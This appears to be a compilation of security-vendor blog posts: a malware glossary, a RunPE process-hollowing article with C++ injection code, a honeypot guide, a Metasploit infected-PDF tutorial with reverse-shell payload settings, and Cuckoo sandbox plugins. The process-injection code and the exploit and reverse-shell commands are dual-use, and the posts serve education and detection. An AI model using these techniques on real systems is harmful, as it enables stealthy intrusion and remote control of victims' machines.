General explanation about different kinds of online threats. What they do, and how.

Introduction

Viruses, malware, worms, adware, there are many different kinds of online threats.

It can be confusing for one to understand the level of dangerousness of each, what they do and how to remove. In this post, I will try to demystify this and shed some light on how they sneak into your machine and stay undetected.

If you think that document is missing something, please let me know I’ll be happy to add it.

Definitions

• Malware: Means “Malicious Software”, this is the most general definition.
• Virus (High threat): As soon as a malware has auto-replication feature, it’s a virus. Able to infect other files, Ex: Virut/Sality
• Worm (High threat): Ability to replicate through the network. Can be by email, instant message. Most of the time it’s because the user opens it, but can also exploit some vulnerabilities to propagate. Ex: Worm/Msn
• Adware (Low threat): Means “Advertisement Software”. It will display ads to the user, or play advertisement in the background. Ex: Adware.Eorezo
• Rootkit (High threat): A rootkit modifies system memory (at user or kernel level) to hide itself and/or prevent its removal. Rootkits are usually designed to protect affiliate malware that are weaker. Ex: Rootkit ZeroAccess, Necurs
• Trojan (Medium threat): Ability to open a backdoor on a machine, and download (on demand) some other piece of malware in order to execute it.
• Dropper (Low threat): Is the entry point of an infection, it’s often encrypted and the smallest as possible to bypass antiviruses. Will download the real malware on internet (or extract from resources) and execute it (like a Trojan, yes).
• Password Stealer(High threat): Ability to steal passwords from various sources: Web (Social networks, Banks, …), FTP (to get control of web servers), Email account (to send malware or SPAM in your name). Those passwords are then sent to the attacker.
• Keylogger (High threat): Is able to save everything you type with your keyboard, take screenshots of your screen. They look for password (Like Password Stealer).
• Banker(High threat): Injects some code in your web browser when you are on a bank website (or about to buy something online), so that they get your bank credentials. Those credentials or credit cards are then sent back to the attacker. Ex: Zeus/Zbot.
• (Crypto)Ransomware (High threat): A Ransomware will either totally lock your computer, or for Crypto variants they will encrypt all your documents. In any case they ask a ransom to revert to original state. Ex: Reveton, CryptoLocker.
• Rogue Antivirus (Medium threat): They look like legit antivirus software, but they aren’t. Most of the time they display false infection, and want you to buy them to “remove” the infection. In reality there’s no infection, nor real scanner. And when you buy them, they simply do nothing.
• PUP (Low threat): That means “Potentially Unwanted Software”. They are legit software, but most of the time the user didn’t install them. They are bundled with other software, and user didn’t uncheck the “option” to install the affiliate software. Besides, most of PUPs are also Adware. Some PUPs are also using Rootkit tricks.
• Spambot (Medium threat): They are designed to send SPAMs, either directly from a compromised web server, or using victim messaging. They can also be web crawlers, searching the web for email addresses where to send SPAM.

It’s important to note that a malware can be of several types above. Actually most of them are, for example Zeus is a Banker, with Password Stealer capability, as well as Trojan to turn the machine into a zombie PC (part of a botnet).

• Botnet: It’s a group of zombie machines (bots), all linked to a C&C (see below). Botnets are often used to perform DDoS attacks, sending SPAM, bruteforce passwords (stolen from a database for example), …
• Bot (Zombie PC): A machine part of a botnet. It’s connected to the C&C, waiting for orders to execute.
• C&C (C2): A machine part of the botnet, dedicated to send commands to the others and get information and stolen data back from them. There can be one or several C&C, depending on the botnet architecture and complexity.
• DDoS: Attack by denial of service. To be efficient, must be coordinated between many different IP addresses. Often performed by a botnet. An attack will make the victim’s server/website unreachable, with possible economic consequences.
• SPAM: Illegitimate email, promoting a service, a product or anything.
• Bitcoin mining: Bitcoins are a virtual currency, that can be “mined”. We spend CPU resources (electricity in fact) to earn money.
• Exploit: A vulnerability into a software, operating system, or code in general. When exploitable, this can lead to privilege escalation (get admin rights) or remote code execution (starting a process without the consent of user). An exploit can be fixed by the software editor with a patch.
• 0-day exploit: It’s a vulnerability for which there is no patch available yet. This means everyone having the software is vulnerable.
• Exploit Kit: A kit of exploits. This is a platform server that will test your machine against many exploits, until one works. When an exploit works, the exploit kit will be able to deliver a Payload that will infect your machine. Most of the time, exploit kits are called through a malvertising.
• Payload: This is the “useful load”, the code for which all the infection chain was made for. It can be the malware itself, or its dropper.
• Malvertising: Means “malicious advertising”. It’s an ad that has been designed to call an exploit kit to infect your machine. In theory, major advertising platforms are validating ads before they are served, but smaller platforms don’t do it, or don’t do it right. Some are even created to serve malware under-the-hood.
• Compromised Server: When a server uses software with vulnerabilities, an attacker can take control of it through an exploit. When done, the compromised server can be used in a botnet, or directly to host malware, host phishing pages, send SPAM, …
• Phishing page: A webpage designed to look like a specific Bank login page, social network, anything where a user can put credentials. Those credentials will then be used for malicious actions, or sold.
• Persistence Item: This is an item that gives a malware the ability to be started at boot. It can be a registry key, a startup shortcut, a patched system file, a MBR infection, … (see below).
• Hooking: Setup a hook is an action performed by a rootkit. We can summarize that action by placing a filter on top of a system API. For example, NtOpenProcess is the API needed if we want to kill a process. If a rootkit hooks that API, it will be able to tell if the process termination is allowed or not, and protect its process.

Why are malware made?

They of course are made to make money. A lot of people are not understanding how malware writers make money.
It’s indeed a very lucrative activity, here’s a quick list of how they earn money:

• Selling malware/code: That’s the most obvious way to earn money. Malware writers sell their malware to other bad people, or sometimes they sell the source code.
• Displaying ads: That’s how adware make money. Each ad displayed/clicked generates money for them.
• Click fraud on ads: That’s another way to make money with ads. While the previous one is barely legal, this one is totally prohibited. Malware will simulate clicks on ads in the background, so the infected user will never know that his machine is clicking on ads. Ads clicked of course belong to the malware writer.
• Sending SPAM: A compromised server, or a bot, can be used to send SPAM to a list of email addresses. Spammers earn money every 1000 SPAMs sent.
• Selling Information: A banker, password stealer will bring back stolen passwords, and credit cards numbers. They are sold on black market at a rate that depends on which country they are from (Ex: 50$ for a US). Personal data can also be sold: Name – Email – Phone number, for SPAM campaigns.
• Providing easy malware installation: Rootkits can download/install/protect an affiliate malware (with compensation). Exploit kits are paid to install a particular payload.
• Selling Rogue Licenses: Rogue software owner will earn money by selling fake licenses.
• Asking Ransom: A Ransomware owner will be paid by infected people for giving them access back to machine/files. But most of the time they just take the money.
• Sell/Lease a Botnet: A Botnet can be useful for attacking a contestant, etc. Botnet owner is paid to give control of his botnet for 24/48/72 hours. The higher the number of bots, the higher the price.
• Bitcoin mining: Bitcoin mining is most of the time performed on infected machine, because malware owner will not pay power consumption. But he will get bitcoins into his own wallet.
• Selling/Blackmail DDoS attacks: Same as leasing a botnet, except that botnet owners can also blackmail a company himself by offering to NOT attacking them if they pay a ransom. Imagine a big commercial website being attacked during black Friday. They can’t, and sometimes they pay the ransom.
• Selling exploits/0-day: Some people are specialized in searching and selling 0-day exploits to bad guys. Depending on the targeted software, these 0-day exploits can be sold several thousands of dollars. They will then be integrated in exploit kits (above).

It all start with an infection

• Installed by the user itself: Fake P2P music/video file that is actually a EXE file. Fake cra.ck/key.gen for a software.
• Bundled software: User will download an installer for a software A, but will not uncheck affiliate programs installation. This will result with installation of software A, B, C. Unfortunately, B and C are malware.

Pdfcreator installing AVG-Toolbar

• Drive-by-download: This is the term used when speaking of malvertising, malicious web code, fake “required” plugins. It can be installed after you open an email attachement. They are installed sometimes without the user knowing it.

Fake plugin (grahamcluley.com)

Malware deployment

A malware will often be deployed in several steps:
The dropper is the file that is served first (the one you downloaded), that dropper is usually heavily encrypted, packed to bypass antiviruses. It will either unpack the payload from a resource, or download it directly from a server. Then the payload is executed.

Once executed, the payload will very often “install” itself to survive at reboot with a persistence item (see below). Additionally it can load several components to hide itself and/or harden its removal. Then it will perform the task for which is was designed.

(damballa.com)

Persistence Items

The persistence item of a malware is what makes it start at boot. Without it, malware would no longer exist after a machine is restarted.
So persistence item is the weakness of every malware infection.
Here’s a quick list of where a malware can hide its persistence item:

• Registry: RUN key, Services key, Browser Helper Object, … There are tons of different places in the registry to start a software at boot.
• Scheduled Task: We can schedule a program to start at boot.
• Startup folders: Placing a shortcut into one of them will start the program at boot.
• MBR/VBR infection (Bootkit): A bootkit will modify bootstrap/bootloader code of the Master Boot Record or Volume Boot Record to load its own driver before the operating system even loads.
• Patched system file: By modifying a legit system file (that is loaded at startup), the malware can place its own code and it will be executed at startup.
• Web browser extension: Nowadays, a computer will 99% of the time have a web browser opened during a work session. So an extension is a good choice to place malware code, plus it will have access to a lot of sensitive information.

Remaining Stealth

To remain hidden in the system, malware will often use several tips:

• Use randomly generated names to avoid detection by name.
• Hijack system names (1), Ex: svhost.exe (the real one is svchost.exe).
• Hijack system names (2), Ex: %temp%/explorer.exe (the real one is %windir%/explorer.exe). In task manager, we don’t see the full path.
• Perform process injection: Either by injecting code into existing process (like explorer.exe), or by creating a copy of existing process and by injecting code into it.
• Use hooking to hide or protect its process, persistence items.

Removal

To remove an infection, you can do it with several ways:

• Remove payload (99% of the time, a file).
• Remove persistence item(s).

Removing both is better, but either way would prevent the malware from loading.

Links

http://whatis.techtarget.com/definition/command-and-control-server-CC-server
http://www.tripwire.com/state-of-security/vulnerability-management/how-stolen-target-credit-cards-are-used-on-the-black-market/
https://blogs.mcafee.com/consumer/drive-by-download
http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/

The post Malware, viruses, what are they? appeared first on Adlice Software.

The post VTUploader appeared first on Adlice Software.

The post LogAnalyzer appeared first on Adlice Software.

The post WIGI appeared first on Adlice Software.

The post MRF appeared first on Adlice Software.

Study of a hack used by malware to hide code inside a well know process.

Introduction

Disclaimer: This is not a tutorial to make a malware, but a practical case for educational purpose only. Anyway, this is covered for decades on other websites…

Hiding a process has always being challenging for malware writers, and they found many ways to do so. The tip I’ll talk about is very basic, yet simple to write, but doesn’t work all the time. This trick is known under the name “RunPE” and has been used many time in malware industry, especially in RATs (Remote Administration Tools).

Basically, when a malware starts, it will pick a victim among the Windows processes (like explorer.exe) and start a new instance of it, in a suspended state. In that state it’s safe to modify and the malware will totally clear it from its code, extend the memory if needed, and copy its own code inside.

Then, the malware will do some magic to adjust the address of entry point as well as the base address and will resume the process.
After being resumed, the process shows being started from a file (explorer.exe) that has nothing to do anymore with what it actually does.

RunPE: Code

void RunPe( wstring const& target, wstring const& source )
{
    Pe src_pe( source );        // Parse source PE structure
    if ( src_pe.isvalid )
    {        
        Process::CreationResults res = Process::CreateWithFlags( target, L"", CREATE_SUSPENDED, false, false ); // Start a suspended instance of target
        if ( res.success )
        {
            PCONTEXT CTX = PCONTEXT( VirtualAlloc( NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE ) );   // Allocate space for context
            CTX->ContextFlags = CONTEXT_FULL;

            if ( GetThreadContext( res.hThread, LPCONTEXT( CTX ) ) )    // Read target context
            {
                DWORD dwImageBase;
                ReadProcessMemory( res.hProcess, LPCVOID( CTX->Ebx + 8 ), LPVOID( &dwImageBase ), 4, NULL );        // Get base address of target
                
                typedef LONG( WINAPI * NtUnmapViewOfSection )(HANDLE ProcessHandle, PVOID BaseAddress);
                NtUnmapViewOfSection xNtUnmapViewOfSection;
                xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"));
                if ( 0 == xNtUnmapViewOfSection( res.hProcess, PVOID( dwImageBase ) ) )  // Unmap target code
                {
                    LPVOID pImageBase = VirtualAllocEx(res.hProcess, LPVOID(dwImageBase), src_pe.NtHeadersx86.OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);  // Realloc for source code
                    if ( pImageBase )
                    {
                        Buffer src_headers( src_pe.NtHeadersx86.OptionalHeader.SizeOfHeaders );                 // Read source headers
                        PVOID src_headers_ptr = src_pe.GetPointer( 0 );
                        if ( src_pe.ReadMemory( src_headers.Data(), src_headers_ptr, src_headers.Size() ) )
                        {
                            if ( WriteProcessMemory(res.hProcess, pImageBase, src_headers.Data(), src_headers.Size(), NULL) )   // Write source headers
                            {
                                bool success = true;
                                for (u_int i = 0; i < src_pe.sections.size(); i++)     // Write all sections
                                {
                                    // Get pointer on section and copy the content
                                    Buffer src_section( src_pe.sections.at( i ).SizeOfRawData );
                                    LPVOID src_section_ptr = src_pe.GetPointer( src_pe.sections.at( i ).PointerToRawData );
                                    success &= src_pe.ReadMemory( src_section.Data(), src_section_ptr, src_section.Size() );                                    

                                    // Write content to target
                                    success &= WriteProcessMemory(res.hProcess, LPVOID(DWORD(pImageBase) + src_pe.sections.at( i ).VirtualAddress), src_section.Data(), src_section.Size(), NULL);
                                }

                                if ( success )
                                {
                                    WriteProcessMemory( res.hProcess, LPVOID( CTX->Ebx + 8 ), LPVOID( &pImageBase), sizeof(LPVOID), NULL );      // Rewrite image base
                                    CTX->Eax = DWORD( pImageBase ) + src_pe.NtHeadersx86.OptionalHeader.AddressOfEntryPoint;        // Rewrite entry point
                                    SetThreadContext( res.hThread, LPCONTEXT( CTX ) );                                              // Set thread context
                                    ResumeThread( res.hThread );                                                                    // Resume main thread
                                }                               
                            }
                        }                       
                    }
                }
            }

            if ( res.hProcess) CloseHandle( res.hProcess );
            if ( res.hThread ) CloseHandle( res.hThread );
        }
    }
}
...
RunPe( L"C:\\windows\\explorer.exe", L"C:\\windows\\system32\\calc.exe" );

The source code is self explaining, however I chose to let it strongly tied to our underlying library (Pe, Process, …) so that the code will not work out of the box (to avoid script kiddies using it for bad things). An advised engineer will be however able to understand the logic and recreate the binary.

The main program will call RunPe function with explorer.exe as a target, and calc.exe as a source. This will result in running calc.exe code into an explorer.exe “skin”.

The RunPe function will simply create explorer.exe in a suspended state, remove the sections belonging to that module with NtUnmapViewOfSection. Then it will allocate more memory at the same preferred address as the former unmapped sections to host the target (calc.exe) code.

That code (header + sections) is copied into the newly allocated section, and we adjust the image base + entry point address to match the new offset (explorer.exe base may be different). To finish, the main thread is resumed.

RunPE: Results

After create suspended

After explorer.exe sections are unmapped

After new section is allocated

After calc.exe code is written

Process Hacker shows Calc caption window in explorer.exe

calc.exe strings appear in explorer.exe sections

RunPE: Detection

As this trick is simple, it’s also simple to detect. We can assume safely (except for .NET assemblies) that a PE Header will be 99% the same in memory and in the disk image of a process.

Knowing that, we can then compare in each process the PE header of the file on disk with the image in memory. If there’s too much differences, we can safely assume the process is hijacked. RogueKiller in version 10.8.3 is able to detect RunPE injection.

Detection of RunPE

Links

• https://blackc0.de/2014/06/defeating-runpe-malware-packer/
• http://menalix.com/?tag=runpe-injection
• http://www.autosectools.com/process-hollowing.pdf

The post RunPE: How to hide code behind a legit process appeared first on Adlice Software.

Whether your are a security researcher or a sysadmin, you need a honeypot for various reasons: If you are a security researcher it’s because honeypots are very valuable source of malware and exploits, they also give hints about where the threats come from, and how big they are. If you are a sysadmin it’s because honeypots will be the first machines to be hit in your network, they can raise the red flag in case of an intrusion.

Definition

What is a honeypot? A honeypot is a machine configured to be (or at least, appear to be) vulnerable to exploits and/or password bruteforcing. Such machine needs to be fully exposed to the world, so that it can catch as many attacks as possible. Other than that, the machine needs some mechanisms to automatically alert administrator in case of an intrusion. That’s all.

MHN (Modern Honeypot Network)

I will present you an all-included solution called MHN (official page: https://github.com/threatstream/mhn), easy to deploy with few configuration.

MHN is made of at least 2 components: UI and a sensor, and it’s preferable for security to deploy those on 2 different servers.

Sensors are individual honeypots with a unique goal. They are based on other projects, deployed and linked to the UI very easily.

We will study the particular case of dionaea (link: http://www.edgis-security.org/honeypot/dionaea/ -official link appears to be down-), which handles many attacks like HTTP, HTTPS, MYSQL, FTP, SMB, …

MHN User Interface

To deploy user interface on the first machine, do the following (Ubuntu 14.04 tested):

$ cd /opt/
$ sudo apt-get install git -y
$ sudo git clone https://github.com/threatstream/mhn.git
$ cd mhn/
$ sudo ./install.sh

During install, some configuration will be requested:

===========================================================
MHN Configuration
===========================================================
Do you wish to run in Debug mode?: y/n n
Superuser email: YOUR_EMAIL@YOURSITE.COM
Superuser password: 
Server base url ["http://"]: 
Honeymap url ["http://:3000"]:
Mail server address ["localhost"]: 
Mail server port [25]: 
Use TLS for email?: y/n n
Use SSL for email?: y/n n
Mail server username [""]: 
Mail server password [""]: 
Mail default sender [""]: 
Path for log file ["mhn.log"]:

Once installed, the panel should be available on http://ip_of_your_ui_server.
Login with “Superuser” credentials.

Deploy dionaea Honeypot

Once logged into the UI, you will notice that everything is empty.
We first need the deploy a sensor and connect it back to MHN.

To do so, navigate to “Deploy”, and select “Dionaea Ubuntu” in the list.
This will give you a deploy command like this (don’t use this one!):

wget "http:///api/script/?text=true&script_id=7" -O deploy.sh && sudo bash deploy.sh http:// 

Copy and paste that command into a terminal on your sensor machine (remember, it’s better to be a separate machine). Execute it and watch. Once installed, you should see a new sensor in the list:

You’re all set! If your sensor IP is well known, you should start to get connexions from bots.
They are logged as ‘attacks’, but they are most of the time only port scan.

Test Honeypot

We can make sure everything is well configured with a manual test with little help of metasploit.
If you have a machine with metasploit installed (not covered here), you can execute the following command:

msfconsole -x "use exploit/windows/smb/ms10_061_spoolss; set PNAME XPSPrinter; set RHOST ; set LHOST ; set LPORT 4444; exploit; exit"

It should be able to send a payload on the sensor machine:
 

 
And the sensor should be able to log the activity:
 

 
Also, the sensor should have captured the payload:
 

 
That’s it, now you should be able to catch in-the-wild threats.
You can take a look at other built-in sensors, they worth it!

After a few days:

After a few days, this is what it looks like:
 

 
The map shows real time attacks (no history is kept), and is quite interesting:
 

Links

– https://github.com/threatstream/mhn
– http://www.edgis-security.org/honeypot/dionaea/
– http://www.metasploit.com/

The post Catch malware with your own Honeypot appeared first on Adlice Software.

Infected PDFs have always been a privileged way to infect users because this document format is very common and used by almost everyone. Moreover, it exists many ways to exploit Acrobat Reader vulnerabilities and it’s very stealth and elegant way to launch a malware.

In this article, I will show you how easy it is to craft a malicious PDF with custom shellcode, and trigger a vulnerability to execute a payload. We will also analyse the malicious PDF to learn how the payload is stored, and how to extract it.

This article is for research purpose only, don’t do bad things!

PDF Format

PDF is object oriented format, defined by Adobe. This format describes a document organization, and preserves dependencies needed for the document (fonts, images, …). These objects are stored within the document as streams and most of the time encoded or compressed. Below is the overview of a classic PDF document. For more information, please read Adobe’s specifications.
 

Infected PDF creation

We will create a fake PDF with metasploit, containing an exploit attempt, as well as a custom payload (code to execute). The exploit is targeting a specific version of Adobe Reader, so we will need to make some archaeology and find an ancient Reader version (thanks to http://www.oldapps.com/) to install on the target machine.

So, first, let’s make this PDF. We will make a infected PDF that just opens calculator (calc.exe) on the machine, just for demonstration. Open a metasploit console (installation of metasploit is not covered in this article) and type:

use exploit/windows/fileformat/adobe_utilprintf
set FILENAME malicious.pdf
set PAYLOAD windows/exec
set CMD calc.exe
show options
exploit

This should look like this:

Copy the file that has just been created (here /home/osboxes/.msf4/local/malicious.pdf) on a shared drive. You will need to feed your target machine with it.

Infected PDF execution

On the target machine, download and install a vulnerable Adobe Reader version (metasploit tells us it should be less than 8.1.2). I choose to install a 8.1.1 version.

Once installed, execute the malicious.pdf file. You should see a calculator being spawned from the Adobe Reader process. That’s the exploit.

I’ve done another PDF but changed the payload slightly, just for fun:

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.29
set LPORT 4455

Here’s the result. Adobe Reader now has a backdoor (reverse shell) listening for commands.

Infected PDF analysis

Played enough! Let’s see what’s inside that malicious PDF, and let’s try to extract the malicious payload (we’re still with the calc.exe PDF).

First, we will need a tool called PDF Stream Dumper, so download it. Load the malicious PDF with it, and take some time to familiarize yourself with the tool.

We can start by checking if some exploit is detected by the tool using the “Exploit Scan” menu:

Exploit CVE-2008-2992 Date:11.4.08 v8.1.2 - util.printf - found in stream: 6

Indeed, there’s an exploit hidden in stream 6 (the one in blue on the capture).

But let’s start by the beginning: when searching for exploits in a PDF, we most of the time encounter heap spray created by a Javascript code. That heap spray is used to push the payload on the heap, ready to be executed once the vulnerability has triggered.

If you open Stream 1, you can see:

/Type/Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 5 0 R

That we can translate to OpenAction on stream 5. Let’s move to stream 5:

/Type/Action/S/JavaScript/JS 6 0 R

Which says to execute Javascript located in stream 6. This stream shows plain Javascript, it’s time to open the “Javascript_UI” menu. We immediately recognize a big string hex encoded, and pushed into a variable for heap spray. This is our payload:

Fortunately, we have tools to manipulate it, and understand what it does. Select the payload (the part between quotes), and open “Shellcode_analysis” menu. Then choose “scDbg – LibEmu Emulation”. You will get a new window will the shellcode decoded into bytes (you can even save it to file):

LibEmu is a library able to simulate a processor, it gives information about what the assembly code is trying to do. Just hit the “Launch” button and you will understand:

Here it is, we can clearly see the shellcode will just opens a calc.exe window and exits.
Let’s redo the same analysis for the other malicious PDF (reverse shell):

Uh, self explaining right? Shellcode is loading the library needed to manipulate sockets (ws2_32.dll), and tries to connect back to C&C.

I haven’t told about the exploit itself, it’s located at the end of the javascript code (like stated by Exploit search, “util.printf – found in stream: 6”). It’s exploiting a buffer overflow on printf function to execute arbitrary code (here, our heap-sprayed shellcode).

util.printf("%45000.45000f", 0);

Links

– http://www.sans.org/reading-room/whitepapers/malicious/owned-malicious-pdf-analysis-33443
– http://www.oldapps.com/adobe_reader.php
– http://contagiodump.blogspot.fr/2010/08/malicious-documents-archive-for.html
– http://contagiodump.blogspot.fr/2013/03/16800-clean-and-11960-malicious-files.html
– http://eternal-todo.com/blog/cve-2011-2462-exploit-analysis-peepdf
– http://blog.9bplus.com/analyzing-cve-2011-2462/
– https://www.fireeye.com/blog/threat-research/2012/07/analysis-of-a-different-pdf-malware.html
– http://resources.infosecinstitute.com/analyzing-malicious-pdf/

The post Infected PDF: Extract the payload appeared first on Adlice Software.

The post RogueKillerPE appeared first on Adlice Software.

The post RogueKiller appeared first on Adlice Software.

Description

 
RogueKillerPE is a PE parsing tool, able to show internal structure of executable files. It’s able to read either the memory image (process module) or the disk image (filesystem) of a given executable.

Why buy Premium?

• Privileged support: Easy and Fast support for you, don’t hesitate to bother us.
• No nag window: Go faster without the nag window.
• To help us maintaining the software efficient for everyone.

Features:

• Open PE from file, and read disk image.
• Open PE from process, and read memory or disk image.
• Open file from command line.
• Drag and drop support.
• Explorer context menu integration.
• Process general information (pid, parent, …)
• File general information (attributes, size, …)
• Process module general information (address, size, …)
• A bunch of hashes (MD5, SHA1, SHA256, …)
• Process memory pages, with ability to dump.
• Injected pages detection, non-readable pages detection.
• Ability to dump injected pages to file.
• Hex code, with ability to search (hex values, or string ANSI/UNICODE).
• Assembly code, with ability to navigate.
• PE Headers (MZ, PE, Optional, …)
• RunPE detection, shows which header fields are modified.
• Checksum validation.
• PE Sections, with ability to watch hex code and dump to file.
• PE Imports, with ability to watch APIs assembly code (memory only).
• PE Exports, with ability to watch APIs assembly code.
• Hooks detection in imports/exports (table and inline hooks).
• PE Resources. Able to parse all well known types and display them accordingly (strings, version information, icons, …)
• Ability to scan resources on VirusTotal.
• Executable files detection in resources.
• Ability to watch hex code of resources.
• Ability to dump resources to file.
• PDB path detection.
• Strings scanner, with classification (Registry, files, …)
• Ability to dump all strings (by category or not) to file.
• Digital Signature parsing (embedded only).

User guide

• Start the tool.
• Drag a file on the interface, or load the process list.
• If you choose a file, there you go.
• If you choose a process, you can inspect a different module by selecting a new one in the modules list.
• If you choose a process, you can toggle disk/image and switch from process memory to disk image and vice-versa.

Changelog

The post RogueKillerPE download appeared first on Adlice Software.

Cuckoo Sandbox is a neat open source project used by many people around the world to test malware into a secure environment, to understand how they work and what they do. Cuckoo is written in a modular way, with python language. It’s really easy to customize, and this is what I’m going to show you here.

Cuckoo Sandbox

You can download and install Cuckoo Sandbox here, and here’s a tutorial on how to configure it. We will not cover the installation of cuckoo itself because the guide is really well done.

Customization, the idea

Let’s study a real example that we’ve done for our own purpose, here at Adlice Labs. We wanted an easy way to test for malware removal with our software, RogueKiller. The idea is to get a removal report for malware that we send to the sandbox, let’s take a look.

The Cuckoo team made a guide for customization as well, this will be our reference.
In our templates below, for consistency all our file modules will be named “custom.py”. Just adapt to your case.

Auxiliary (guest) module

The auxiliary guest modules are located into /analyzer/windows/modules/auxiliary.
They are executed before the malware, on the guest machine. Therefore they can be useful to log some initial state machine information.

import logging
import json

from lib.common.abstracts import Auxiliary
from lib.common.results import NetlogFile

log = logging.getLogger(__name__)

class Custom(Auxiliary):
    """Gather custom data"""

    def __init__(self, options={}, analyzer=None):
        Auxiliary.__init__(self, options, analyzer)

    def start(self):
        log.info("Starting my Custom auxiliary module")
        nf = NetlogFile("logs/initial.json")
        nf.send(json.dumps(['foo', {'bar': ('baz', None, 1.0, 2, False)}]))

As a result, a initial.json file is created into /logs.

Package module

The package modules are located into /analyzer/windows/modules/packages.
They are responsible for executing and injecting the malware for analysis, they are executed on the guest.
You can define different execution routines, depending on the type of malware (exe, swf, pdf, …)
I have implemented the finish method to make some post execution actions, we will see later for a concrete example of this.

import os
import shlex
import json
import logging

from lib.common.abstracts import Package
from lib.common.results import NetlogFile

log = logging.getLogger("analyzer")

class CustomExe(Package):
    """Custom analysis package."""

    def start(self, path):
        args = self.options.get("arguments", "")

        name, ext = os.path.splitext(path)
        if not ext:
            new_path = name + ".exe"
            os.rename(path, new_path)
            path = new_path

        return self.execute(path, args=shlex.split(args))

    # Post execution
    def finish(self):
        nf = NetlogFile("logs/post.json")
        nf.send(json.dumps(['foo', {'bar': ('baz', None, 1.0, 2, False)}]))
        return True

As a result, a post.json file is created into /logs.

Processing module

The processing modules are located into /modules/processing.
They are executed on the host, to append data generated by the modules above into the global container. That way, the data will be available by all the next modules for processing and reporting.

To enable a new processing module, you need to add that section into /conf/processing.conf.

[custom]
enabled = yes

import os
import json

from lib.cuckoo.common.abstracts import Processing
from lib.cuckoo.common.exceptions import CuckooProcessingError

class Custom(Processing):
    """Analysis custom information."""

    def run(self):
        """Run debug analysis.
        @return: debug information dict.
        """
        self.key = "custom"
        data = {}
        try:
          #initial
          custom_log = os.path.join(self.logs_path, "initial.json")
          with open(custom_log) as json_file:          
            data["initial"] = json.load(json_file)
        except Exception, e:
          raise CuckooProcessingError(str(e))

        try:
          #post
          custom_log = os.path.join(self.logs_path, "post.json")
          with open(custom_log) as json_file:          
            data["post"] = json.load(json_file)
        except Exception, e:
          raise CuckooProcessingError(str(e))

        return data

As a result, data from initial.json and post.json are appended into the global container. If the Json reporting module (builtin) is enabled, you will retrieve their content into it, under the “custom” key.

Reporting module

The reporting modules are located into /modules/reporting.
They are executed on the host, to translate data from the global container into a different format. It could be a HTML page, json file, even a PDF or something else.

To enable a new reporting module, you need to add that section into /conf/reporting.conf.

[custom]
enabled = yes

import os
import json
import codecs

from lib.cuckoo.common.abstracts import Report
from lib.cuckoo.common.exceptions import CuckooReportError

class Custom(Report):
    """Saves custom results in JSON format."""   
    def run(self, results):
        """Writes report.
        @param results: Cuckoo results dict.
        @raise CuckooReportError: if fails to write report.
        """

        try:
            path = os.path.join(self.reports_path, "custom.json")

            with codecs.open(path, "w", "utf-8") as report:
                json.dump(results["custom"], report, sort_keys=False, indent=4)
        except (UnicodeError, TypeError, IOError) as e:
            raise CuckooReportError("Failed to generate JSON report: %s" % e)

As a result, data from initial.json and post.json that was stored in the global container is returning back to a single “custom.json” file. But we could have easily done a HTML, a PDF or something else.

Concrete use case: Removal report

The idea is to get a removal report for a malware with a given anti-malware scanner, RogueKiller.
To do so, we will use a new package module, for which we will write a finish routine that runs and inject our antimalware:

import os
import shlex
import json
import logging
import urllib2
import tempfile

from lib.common.abstracts import Package
from lib.common.results import upload_to_host
from lib.api.process import Process
from lib.common.defines import KERNEL32

log = logging.getLogger("analyzer")

class ExeWithRemoval(Package):
    """Custom analysis package."""

    def start(self, path):
        args = self.options.get("arguments", "")

        name, ext = os.path.splitext(path)
        if not ext:
            new_path = name + ".exe"
            os.rename(path, new_path)
            path = new_path

        return self.execute(path, args=shlex.split(args))

    # Post execution
    def finish(self):
        try: 
          #download
          response = urllib2.urlopen("http://link_to_roguekillercmd.exe")
          f = tempfile.NamedTemporaryFile(delete=False)           
          data = response.read()   
          f.write(data)
           
          #rename
          path = f.name + ".exe"          
          f.close()
          os.rename(f.name, path)
          log.info("Downloaded remover program to %s", path)

          #execute
          args = "-scan -dont_ask -params \"-autoremove\""
          pid  = self.execute(path, args=shlex.split(args))
          log.info("Executing remover program with args: %s", args)

          #wait for end
          while Process(pid=pid).is_alive():
              KERNEL32.Sleep(1000)			  
		  
          #upload report
          upload_to_host("C:/path_to_my_report.json", "logs/removal.json")

          log.info("Executed remover program with args: %s", args)
        except Exception, e:
          log.exception("Error while loading the remover program")

        return True

After the analysis is done, finish() is called. In this method we download in a temporary file our anti-malware (in CLI version), then we run it under cuckoo injection.
Once the report is generated we upload it back to the host to attach it to our analysis. Then the cuckoo report is generated and we can compare what the malware did, and what the anti-malware was able to catch and remove. Simple as that!

In our example below, the malware was a fake putty binary, notice the RogueKillerCMD scanner running.

Links

• http://docs.cuckoosandbox.org/en/latest/customization/
• http://stackoverflow.com/questions/27816127/add-module-inside-cuckoo-sandbox
• https://github.com/cuckoosandbox/cuckoo/issues/892
• https://github.com/cuckoosandbox/cuckoo/issues/888

The post Cuckoo Sandbox Customization appeared first on Adlice Software.

Description

 
YaraEditor is a tool that will help you to write and test signatures for the Yara engine. To learn how to write signatures with the Yara syntax, please refer to the proper documentation.

Features:

• Syntax highlighting.
• Drag N drop support.
• Write signatures in a form-like style.
• Handle rules set (multiple rules)
• Compile rules and fix your errors.
• Test your rules against strings (ANSI/Unicode).
• Test your rules by scanning processes memory.
• Test your rules by scanning files.

User guide

• Start the tool.
• Drag a file on the interface, or start from scratch.
• Add as many rules as needed.
• Compile them, and check for errors.
• In the test tab, add some test items and run the tests.
• Matched items should appear.

Changelog

The post YaraEditor appeared first on Adlice Software.

General explanation about different kinds of online threats. What they do, and how.

Introduction

Viruses, malware, worms, adware, there are many different kinds of online threats.

It can be confusing for one to understand the level of dangerousness of each, what they do and how to remove. In this post, I will try to demystify this and shed some light on how they sneak into your machine and stay undetected.

If you think that document is missing something, please let me know I’ll be happy to add it.

Definitions

• Malware: Means “Malicious Software”, this is the most general definition.
• Virus (High threat): As soon as a malware has auto-replication feature, it’s a virus. Able to infect other files, Ex: Virut/Sality
• Worm (High threat): Ability to replicate through the network. Can be by email, instant message. Most of the time it’s because the user opens it, but can also exploit some vulnerabilities to propagate. Ex: Worm/Msn
